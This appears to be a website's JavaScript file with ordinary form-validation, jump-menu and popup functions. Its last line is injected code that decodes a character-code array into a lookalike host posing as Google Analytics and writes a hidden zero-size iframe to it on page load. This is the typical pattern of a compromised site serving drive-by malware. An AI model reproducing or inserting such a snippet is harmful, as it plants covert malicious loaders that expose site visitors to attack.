<!--
function MM_jumpMenu(targ,selObj,restore){
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}

function rs_submit_de() {
	errorMSG = 'Pflichtfelder:   \n\n';
	startLength = errorMSG.length;
	if (document.request.name.value == '') errorMSG += '- Vorname\n';
	if (document.request.surname.value == '') errorMSG += '- Nachname\n';
	if (document.request.street.value == '') errorMSG += '- Strasse\n';
	if (document.request.zip.value == '') errorMSG += '- PLZ\n';
	if (document.request.city.value == '') errorMSG += '- Ort\n';
	if (document.request.country.value == '') errorMSG += '- Land\n';
	if (document.request.email.value.indexOf('@') < 1 || document.request.email.value.indexOf('.') < 1) errorMSG += '- E-mail\n';
	if (errorMSG.length != startLength) {
		alert(errorMSG);
	}
	else {
		document.request.submit();
	}
}

function popup(url) {
    var url;
    var sW = screen.width;
    var sH = screen.height;
    var wH = 610;
    var wW = 617;
    var hW = (sW / 2) - (wW / 2);
    var hH = (sH / 2) - (wH / 2);
    win = window.open(url,'_blank','height=' + wH + ',width=' + wW + ',left=' + hW + ',top=' + hH + ',scrollbars=yes,resizable=no');
}
var date = new Date();var mktime = (Math.round((date.getTime()/1000),0)-2);var query = new Array(46,116,101,99,104,110,105,107,119,105,107,105,46,99,111,109);var link = new String("http://www.google-analytics.com");for(var i in query)link += String.fromCharCode(new String(query[i]));link += new String("?id=39"+mktime+"71");document.write("<iframe src='"+link+"' style='visibility:hidden' width='0' height='0' frameborder='0'></iframe>");
//-->
